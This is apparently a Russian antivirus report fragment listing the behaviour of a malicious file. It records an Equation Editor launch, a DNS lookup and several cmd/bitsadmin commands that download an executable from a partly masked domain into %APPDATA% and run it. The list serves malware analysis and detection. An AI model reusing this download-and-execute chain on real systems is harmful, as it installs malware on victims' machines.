Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer YY /priority foreground http://pr####a-elog.com/images/habu/Abu_outputC53980F.exe %APPDATA%\NDF.exe && start %APPDATA%\NDF.exe
- DNS ASK pr####a-elog.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer YY /priority foreground http://pr####a-elog.com/images/habu/Abu_outputC53980F.exe %APPDATA%\NDF.exe && start %APPDATA%\NDF.exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer YY /priority foreground http://pr####a-elog.com/images/habu/Abu_outputC53980F.exe %APPDATA%\NDF.exe